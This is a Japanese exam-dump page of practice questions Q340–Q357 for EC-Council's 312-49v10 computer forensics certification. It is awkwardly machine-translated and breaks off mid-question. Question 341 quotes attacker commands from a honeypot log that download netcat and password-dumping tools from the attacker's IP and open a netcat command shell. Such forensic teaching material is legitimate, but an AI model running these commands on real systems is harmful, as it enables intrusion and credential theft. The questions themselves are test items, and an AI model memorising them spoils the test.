このページは Free Exams Dumps Materials [ http://exams.dumpsmaterials.com ] からエクスポートされました。 エクスポート日時:Thu Dec 5 2:33:23 2024 / +0000 GMT ___________________________________________________ タイトルPractice Test Questions Dumps Bundle [Q340-Q357]でEC-COUNCIL 312-49v10試験に合格しましょう。 --------------------------------------------------- 模擬試験の質問の束が付いているEC-COUNCIL 312-49v10試験に合格しなさい 2022有効な312-49v10試験解答&EC-COUNCIL試験PDF EC-COUNCIL 312-49v10試験のシラバスのトピック: トピック詳細トピック1データベースフォレンジックネットワークフォレンジックWindowsフォレンジックトピック2ハードディスクとファイルシステムの理解電子メール犯罪の調査トピック3コンピュータフォレンジックの調査プロセスダークウェブフォレンジックモバイルフォレンジックトピック4データの取得と複製LinuxとMacのフォレンジック QUESTION 340Windows XPのブート終了時に処理され、ログオンダイアログボックスを初期化するファイルは? NTOSKRNL.EXE NTLDR LSASS.EXE NTDETECT.COM 質問341次の抜粋は、lab.wiretrip.netでホストされたハニーポットログから抜粋されたものです。Snortは、213.116.251.162からのUnicode攻撃を報告しました。ファイル許可の正規化の脆弱性(UNICODE攻撃)により、通常はスクリプトを実行する権利を持っていない任意のフォルダでスクリプトが実行される可能性があります。攻撃者は Unicode 攻撃を試み、最終的に boot.ini の表示に成功します。その後、msadcs.dll を介して RDS での攻撃に切り替えます。RDSの脆弱性により、悪意のあるユーザはIISサーバ上でシェルコマンド(CMD.EXEなど)を実行するSQL文を構築することができる。攻撃者は、簡単なクエリを実行してディレクトリが存在することを発見し、msadcs.dllへのクエリで正しく機能していることを確認する。攻撃者はRDSクエリを実行し、以下のようなコマンドを実行する。"cmd1.exe /c open 213.116.251.162 >ftpcom""cmd1.exe /c echo johna2k >>ftpcom""cmd1.exe /c echo haxedj00 >>ftpcom""cmd1.exe /c echo get nc.exe >>ftpcom""cmd1.cmd1.exe /c echo get pdump.exe >>ftpcom""cmd1.exe/cエコー get samdump.dll >>ftpcom""cmd1.exe/cエコー quit >>ftpcom""cmd1.exe/cftp-s:ftpcom""cmd1.exe/cnc-l-p6969-ecmd1.exe "与えられたエクスプロイトから何が推測できるだろうか。 攻撃者がユーザー名johna2kを使用してログインするローカルエクスプロイトです。 システム上に2人の攻撃者(johna2kとhaxedj00)がいる。 この攻撃はリモートのエクスプロイトであり、ハッカーは3つのファイルをダウンロードします。 攻撃者はハイエンドのUDPポートを指定しているため、シェルを起動することができない。 QUESTION 342Office文書(Word、Excel、PowerPoint)には、文書を作成したマシンのMAC(一意の識別子)を追跡できるコードが含まれています。このコードは何と呼ばれていますか? マイクロソフト仮想マシン識別子 パーソナルアプリケーションプロトコル グローバル一意ID 個別ASCII文字列 QUESTION 343ブラックベリーの電子メールはすべて、最終的にどのRIM独自のメカニズムを通じて送受信されますか? ブラックベリーメッセージセンター マイクロソフト・エクスチェンジ ブラックベリーWAPゲートウェイ ブラックベリーWEPゲートウェイ QUESTION 344次のコマンドのうち、Windowsベースのサーバーで実行されているすべてのネットワークサービスを表示するものはどれですか? ネットスタート ネットセッション ネット使用 ネット構成 QUESTION 345調査者が仮想マシンのインスタンスを取得し、フォレンジック調査プロセスを開始できるクラウドモデルはどれか? PaaSモデル IaaSモデル SaaSモデル SecaaSモデル QUESTION 346「アイドル」システムとは何ですか? インターネットに接続されていないPC ゾンビ 使用されていないPC ボット QUESTION 347次のWebブラウザーのうち、履歴、キャッシュ、Cookieなどの閲覧記録を保存するためにESE(Extensible Storage Engine)データベース形式を使用しているのはどれですか? サファリ Mozilla Firefox Microsoft Edge Google Chrome QUESTION 348ファイルアロケーションテーブルの最初の予約セクタの名前は何ですか? ボリュームブートレコード パーティションブートセクタ マスターブートレコード BIOSパラメータブロック QUESTION 349令状を取得する際に重要なことは? 捜索される場所と押収される品目について特に記述すること。 一般的に、捜索される場所と押収される品目を特に記述する。 捜索される場所を一般的に記述し、押収される品目を一般的に記述する。 特に、捜索される場所と押収される品目について説明してください。 質問350なぜLinux/UnixベースのコンピュータはWindowsコンピュータよりもアイドルスキャンに適しているのですか? Linux/Unixコンピュータは侵害しやすい。 Linux/Unixコンピュータは常に話している Windowsコンピュータは常に話している Windowsコンピュータはアイドルスキャンに応答しない QUESTION 351論理ファイルシステムエラーの修復に役立つWindowsユーティリティはどれですか? リソースモニター ディスククリーンアップ ディスクデフラグ CHKDSK QUESTION 352Linuxのブートプロセスで、システムのハードウェアを初期化するステージはどれですか? BIOSステージ ブートローダステージ BootROMステージ カーネルステージ QUESTION 353Blackberry端末のPassword Keeperで使用されている暗号化技術はどれですか? 3DES AES Blowfish RC5 QUESTION 354Cylieは、フロリダ州aにある州組織のネットワーク侵害を調査しています。彼女は、侵入者がIPパケットでファイアウォールに過負荷をかけることで、会社のファイアウォールにアクセスできたことを発見します。サイリーは調査を通じて、侵入者が会社の電話システムにハッキングし、PBXシステムのハードディスクを使って共有音楽ファイルを保存していることを突き止めた。会社のPBXシステムに対するこの攻撃は何と呼ばれるだろうか? フレーキング スクワッティング クランチング プリテクスティング QUESTION 355次のディレクトリには何が保存されていますか?HKLMSECURITYPolicySecrets 過去20ユーザー分のキャッシュパスワードハッシュ プレーンテキストのサービスアカウントのパスワード IASアカウント名とパスワード ローカル・ストアのPKI Kerberos証明書 QUESTION 356攻撃者のコンピュータが、IDLEスキャンで開いているポートのゾンビコンピュータにIPID 31400を送信した場合、どのような応答が返ってきますか。 ゾンビは応答を送信しません。 31402 31399 31401 質問357Chrisは、顧客の1社から報告されたハッキング事件を調査するよう依頼されました。同社は、この攻撃に内部の共犯者が関与していると疑っています。インシデント現場に到着すると、クリスは物理的なエリアを確保し、目視で現場を記録